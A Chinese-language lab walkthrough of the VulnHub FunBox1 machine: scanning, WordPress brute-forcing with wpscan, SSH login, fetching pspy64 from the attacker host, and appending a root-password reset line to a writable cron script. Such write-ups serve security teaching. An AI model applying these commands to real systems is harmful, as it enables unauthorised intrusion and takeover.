靶机渗透练习22-FunBox1
靶机描述
靶机地址:https://www.vulnhub.com/entry/funbox-1,518/
Description
Boot2Root ! This is a reallife szenario, but easy going. You have to enumerate and understand the szenario to get the root-flag in round about 20min.
This VM is created/tested with Virtualbox. Maybe it works with vmware.
If you need hints, call me on twitter: @0815R2d2
Have fun...
This works better with VirtualBox rather than VMware
一、搭建靶机环境
攻击机Kali:
IP地址:192.168.9.7
靶机:
IP地址:192.168.9.40
注:靶机与Kali的IP地址只需要在同一局域网即可(同一个网段,即两虚拟机处于同一网络模式)
该靶机环境搭建如下
- 将下载好的靶机环境,导入 VritualBox,设置为 Host-Only 模式
- 将 VMware 中桥接模式网卡设置为 VritualBox 的 Host-only
二、实战
2.1网络扫描
2.1.1 启动靶机和Kali后进行扫描
方法一、arp-scan -I eth0 -l (指定网卡扫)
arp-scan -I eth0 -l
☁ FunBox arp-scan -I eth0 -l
Interface: eth0, type: EN10MB, MAC: 00:50:56:27:27:36, IPv4: 192.168.9.7
Starting arp-scan 1.9.7 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.9.2 08:00:27:47:56:4d PCS Systemtechnik GmbH
192.168.9.12 0a:00:27:00:00:03 (Unknown: locally administered)
192.168.9.40 08:00:27:cf:29:18 PCS Systemtechnik GmbH
3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9.7: 256 hosts scanned in 1.942 seconds (131.82 hosts/sec). 3 responded
方法二、masscan 扫描的网段 -p 扫描端口号
masscan 192.168.184.0/24 -p 80,22
方法三、netdiscover -i 网卡-r 网段
netdiscover -i eth0 -r 192.168.184.0/24
方法四、等你们补充
2.1.2 查看靶机开放的端口
使用nmap -A -sV -T4 -p- 靶机ip查看靶机开放的端口
☁ FunBox nmap -A -sV -T4 -p- 192.168.9.40
Starting Nmap 7.92 ( https://nmap.org ) at 2022-02-25 11:25 CST
Nmap scan report for bogon (192.168.9.40)
Host is up (0.00036s latency).
Not shown: 65531 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 d2:f6:53:1b:5a:49:7d:74:8d:44:f5:46:e3:93:29:d3 (RSA)
| 256 a6:83:6f:1b:9c:da:b4:41:8c:29:f4:ef:33:4b:20:e0 (ECDSA)
|_ 256 a6:5b:80:03:50:19:91:66:b6:c3:98:b8:c4:4f:5c:bd (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Did not follow redirect to http://funbox.fritz.box/
| http-robots.txt: 1 disallowed entry
|_/secret/
33060/tcp open mysqlx?
| fingerprint-strings:
| DNSStatusRequestTCP, LDAPSearchReq, NotesRPC, SSLSessionReq, TLSSessionReq, X11Probe, afp:
| Invalid message"
|_ HY000
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port33060-TCP:V=7.92%I=7%D=2/25%Time=62184C2D%P=x86_64-pc-linux-gnu%r(N
SF:ULL,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(GenericLines,9,"\x05\0\0\0\x0b\
SF:x08\x05\x1a\0")%r(GetRequest,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(HTTPOp
SF:tions,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(RTSPRequest,9,"\x05\0\0\0\x0b
SF:\x08\x05\x1a\0")%r(RPCCheck,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(DNSVers
SF:ionBindReqTCP,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(DNSStatusRequestTCP,2
SF:B,"\x05\0\0\0\x0b\x08\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fI
SF:nvalid\x20message\"\x05HY000")%r(Help,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")
SF:%r(SSLSessionReq,2B,"\x05\0\0\0\x0b\x08\x05\x1a\0\x1e\0\0\0\x01\x08\x01
SF:\x10\x88'\x1a\x0fInvalid\x20message\"\x05HY000")%r(TerminalServerCookie
SF:,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(TLSSessionReq,2B,"\x05\0\0\0\x0b\x
SF:08\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\"
SF:\x05HY000")%r(Kerberos,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(SMBProgNeg,9
SF:,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(X11Probe,2B,"\x05\0\0\0\x0b\x08\x05\
SF:x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\"\x05HY0
SF:00")%r(FourOhFourRequest,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(LPDString,
SF:9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(LDAPSearchReq,2B,"\x05\0\0\0\x0b\x0
SF:8\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\"\
SF:x05HY000")%r(LDAPBindReq,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(SIPOptions
SF:,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(LANDesk-RC,9,"\x05\0\0\0\x0b\x08\x
SF:05\x1a\0")%r(TerminalServer,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(NCP,9,"
SF:\x05\0\0\0\x0b\x08\x05\x1a\0")%r(NotesRPC,2B,"\x05\0\0\0\x0b\x08\x05\x1
SF:a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\"\x05HY000
SF:")%r(JavaRMI,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(WMSRequest,9,"\x05\0\0
SF:\0\x0b\x08\x05\x1a\0")%r(oracle-tns,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r
SF:(ms-sql-s,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(afp,2B,"\x05\0\0\0\x0b\x0
SF:8\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\"\
SF:x05HY000")%r(giop,9,"\x05\0\0\0\x0b\x08\x05\x1a\0");
MAC Address: 08:00:27:CF:29:18 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.6
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.36 ms bogon (192.168.9.40)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 25.36 seconds
21---ftp---ProFTPD
22---ssh---OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
80---http---Apache httpd 2.4.41 ((Ubuntu))
33060---mysqlx?
2.2枚举漏洞
21 端口分析
22 端口分析
一般只能暴力破解,暂时没有合适的字典
80 端口分析
发现,会自动跳转到http://funbox.fritz.box/
添加/etc/hosts:192.168.9.40 funbox.fritz.box
简单看了下,发现该站是WordPress
扫描一下目录:gobuster dir -u http://funbox.fritz.box/ -x html,zip,bak,txt,php --wordlist=/usr/share/wordlists/dirb/common.txt
☁ FunBox gobuster dir -u http://funbox.fritz.box/ -x html,zip,bak,txt,php --wordlist=/usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://funbox.fritz.box/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Extensions: html,zip,bak,txt,php
[+] Timeout: 10s
===============================================================
2022/02/25 14:13:51 Starting gobuster in directory enumeration mode
===============================================================
/.hta.html (Status: 403) [Size: 281]
/.hta.zip (Status: 403) [Size: 281]
/.hta (Status: 403) [Size: 281]
/.hta.bak (Status: 403) [Size: 281]
/.hta.txt (Status: 403) [Size: 281]
/.hta.php (Status: 403) [Size: 281]
/.htaccess (Status: 403) [Size: 281]
/.htaccess.zip (Status: 403) [Size: 281]
/.htaccess.bak (Status: 403) [Size: 281]
/.htpasswd (Status: 403) [Size: 281]
/.htaccess.txt (Status: 403) [Size: 281]
/.htpasswd.php (Status: 403) [Size: 281]
/.htpasswd.html (Status: 403) [Size: 281]
/.htaccess.php (Status: 403) [Size: 281]
/.htaccess.html (Status: 403) [Size: 281]
/.htpasswd.zip (Status: 403) [Size: 281]
/.htpasswd.bak (Status: 403) [Size: 281]
/.htpasswd.txt (Status: 403) [Size: 281]
/index.php (Status: 301) [Size: 0] [--> http://funbox.fritz.box/]
/index.php (Status: 301) [Size: 0] [--> http://funbox.fritz.box/]
/license.txt (Status: 200) [Size: 19915]
/readme.html (Status: 200) [Size: 7278]
/robots.txt (Status: 200) [Size: 19]
/robots.txt (Status: 200) [Size: 19]
/secret (Status: 301) [Size: 321] [--> http://funbox.fritz.box/secret/]
/server-status (Status: 403) [Size: 281]
/wp-admin (Status: 301) [Size: 323] [--> http://funbox.fritz.box/wp-admin/]
/wp-content (Status: 301) [Size: 325] [--> http://funbox.fritz.box/wp-content/]
/wp-includes (Status: 301) [Size: 326] [--> http://funbox.fritz.box/wp-includes/]
/wp-settings.php (Status: 500) [Size: 0]
/wp-config.php (Status: 200) [Size: 0]
/wp-links-opml.php (Status: 200) [Size: 221]
/wp-mail.php (Status: 403) [Size: 2709]
/wp-blog-header.php (Status: 200) [Size: 0]
/wp-login.php (Status: 200) [Size: 4502]
/wp-cron.php (Status: 200) [Size: 0]
/wp-load.php (Status: 200) [Size: 0]
/wp-signup.php (Status: 302) [Size: 0] [--> http://funbox.fritz.box/wp-login.php?action=register]
/wp-trackback.php (Status: 200) [Size: 135]
/xmlrpc.php (Status: 405) [Size: 42]
/xmlrpc.php (Status: 405) [Size: 42]
===============================================================
2022/02/25 14:13:54 Finished
===============================================================
访问:http://funbox.fritz.box/robots.txt
发现一个目录
访问:http://funbox.fritz.box/secret/
其他的倒是没什么发现
2.3漏洞利用
2.3.1 使用wpscan扫描网站获取账号密码
使用wpscan枚举用户信息
wpscan --url http://funbox.fritz.box/ -e
发现有两个用户admin,joe
使用wpscan枚举密码
wpscan --url http://funbox.fritz.box/ -U admin,joe --passwords /usr/share/wordlists/rockyou.txt
得到密码joe / 12345,admin / iubire
2.3.2 使用账号密码获取shell
尝试网站登陆,没有发现什么问题
尝试SSH登陆,ssh joe@192.168.9.40
成功登录
joe@funbox:~$ id
uid=1001(joe) gid=1001(joe) groups=1001(joe)
joe@funbox:~$ sudo -l
[sudo] password for joe:
Sorry, user joe may not run sudo on funbox.
2.4权限提升
2.4.1 信息收集
查看用户文件夹
joe@funbox:~$ ls -al /home
total 16
drwxr-xr-x 4 root root 4096 Jun 19 2020 .
drwxr-xr-x 20 root root 4096 Jun 19 2020 ..
drwxr-xr-x 3 funny funny 4096 Jul 18 2020 funny
drwxr-xr-x 5 joe joe 4096 Jul 18 2020 joe
joe@funbox:~$ ls -al /home/funny
total 47608
drwxr-xr-x 3 funny funny 4096 Jul 18 2020 .
drwxr-xr-x 4 root root 4096 Jun 19 2020 ..
-rwxrwxrwx 1 funny funny 55 Jul 18 2020 .backup.sh
-rw------- 1 funny funny 1462 Jul 18 2020 .bash_history
-rw-r--r-- 1 funny funny 220 Feb 25 2020 .bash_logout
-rw-r--r-- 1 funny funny 3771 Feb 25 2020 .bashrc
drwx------ 2 funny funny 4096 Jun 19 2020 .cache
-rw-rw-r-- 1 funny funny 48701440 Feb 25 03:52 html.tar
-rw-r--r-- 1 funny funny 807 Feb 25 2020 .profile
-rw-rw-r-- 1 funny funny 162 Jun 19 2020 .reminder.sh
-rw-rw-r-- 1 funny funny 74 Jun 19 2020 .selected_editor
-rw-r--r-- 1 funny funny 0 Jun 19 2020 .sudo_as_admin_successful
-rw------- 1 funny funny 7791 Jul 18 2020 .viminfo
joe@funbox:~$ ls -al /home/joe
total 56
drwxr-xr-x 5 joe joe 4096 Jul 18 2020 .
drwxr-xr-x 4 root root 4096 Jun 19 2020 ..
-rw------- 1 joe joe 1141 Jul 18 2020 .bash_history
-rw-r--r-- 1 joe joe 220 Jun 19 2020 .bash_logout
-rw-r--r-- 1 joe joe 3771 Jun 19 2020 .bashrc
drwx------ 2 joe joe 4096 Jun 19 2020 .cache
drwxrwxr-x 3 joe joe 4096 Jul 18 2020 .local
-rw------- 1 joe joe 998 Jul 18 2020 mbox
-rw------- 1 joe joe 260 Jun 22 2020 .mysql_history
-rw-r--r-- 1 joe joe 807 Jun 19 2020 .profile
drwx------ 2 joe joe 4096 Jun 22 2020 .ssh
-rw------- 1 joe joe 9549 Jul 18 2020 .viminfo
发现funny用户文件夹有几个敏感文件:.backup.sh,.reminder.sh,html.tar
查看这几个文件
joe@funbox:~$ cat /home/funny/.backup.sh
#!/bin/bash
tar -cf /home/funny/html.tar /var/www/html
joe@funbox:~$ cat /home/funny/.reminder.sh
#!/bin/bash
echo "Hi Joe, the hidden backup.sh backups the entire webspace on and on. Ted, the new admin, test it in a long run." | mail -s"Reminder" joe@funbox
joe@funbox:~$
可以看到两个脚本,都是root权限运行,一个是备份网站,一个是发mail
上传一个pspy64程序,监视程序运行
joe@funbox:~$ cd /tmp
-rbash: cd: restricted
joe@funbox:~$ ls
mbox
joe@funbox:~$ bash
joe@funbox:~$ cd /tmp
joe@funbox:/tmp$ wget http://192.168.9.7/pspy64
--2022-02-25 03:56:39-- http://192.168.9.7/pspy64
Connecting to 192.168.9.7:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3078592 (2.9M) [application/octet-stream]
Saving to: ‘pspy64’
pspy64 100%[=========================================================================================>] 2.94M --.-KB/s in 0.03s
2022-02-25 03:56:39 (116 MB/s) - ‘pspy64’ saved [3078592/3078592]
joe@funbox:/tmp$
开启监控
可以看到.backup.sh会每两分钟执行一次,只需修改脚本执行提权代码即可
2.4.2 权限提升
将以下代码追加到.backup.sh脚本中
完整执行过程
joe@funbox:/home/funny$ vim .backup.sh
joe@funbox:/home/funny$ cat .backup.sh
#!/bin/bash
echo 'root:test' | sudo chpasswd
tar -cf /home/funny/html.tar /var/www/html
joe@funbox:/home/funny$
等一下
joe@funbox:/home/funny# su root
Password:
bash: _parse_usage: line 16: syntax error near unexpected token `('
bash: _parse_usage: line 16: ` -?(\[)+([a-zA-Z0-9?]))'
bash: error importing function definition for `_parse_usage'
bash: _longopt: line 6: syntax error near unexpected token `('
bash: _longopt: line 6: ` --!(no-*)dir*)'
bash: error importing function definition for `_longopt'
root@funbox:/home/funny# id
uid=0(root) gid=0(root) groups=0(root)
root@funbox:/home/funny# cd /root
root@funbox:~# ls -al
total 64
drwx------ 6 root root 4096 Jul 18 2020 .
drwxr-xr-x 20 root root 4096 Jun 19 2020 ..
-rw------- 1 root root 2109 Jul 18 2020 .bash_history
-rw-r--r-- 1 root root 3106 Dec 5 2019 .bashrc
drwx------ 2 root root 4096 Jun 19 2020 .cache
drwx------ 3 root root 4096 Jun 19 2020 .config
-rw-r--r-- 1 root root 49 Jul 18 2020 flag.txt
-rw------- 1 root root 779 Jun 19 2020 mbox
-rw------- 1 root root 200 Jun 19 2020 .mysql_history
-rw-r--r-- 1 root root 161 Dec 5 2019 .profile
-rw-r--r-- 1 root root 74 Jun 19 2020 .selected_editor
drwxr-xr-x 3 root root 4096 Jun 19 2020 snap
drwx------ 2 root root 4096 Jun 19 2020 .ssh
-rw------- 1 root root 8924 Jul 18 2020 .viminfo
root@funbox:~# cat flag.txt
Great ! You did it...
FUNBOX - made by @0815R2d2
root@funbox:~#
成功提权,并拿到flag
总结
本节通过信息收集目录扫描获取敏感目录,利用wpscan进行网站扫描获取账号密码,使用账号密码登陆
SSH,利用计划任务脚本提权
- 发现主机
- 端口扫描
- 目录扫描
- wpspcan扫描
- 计划任务提权
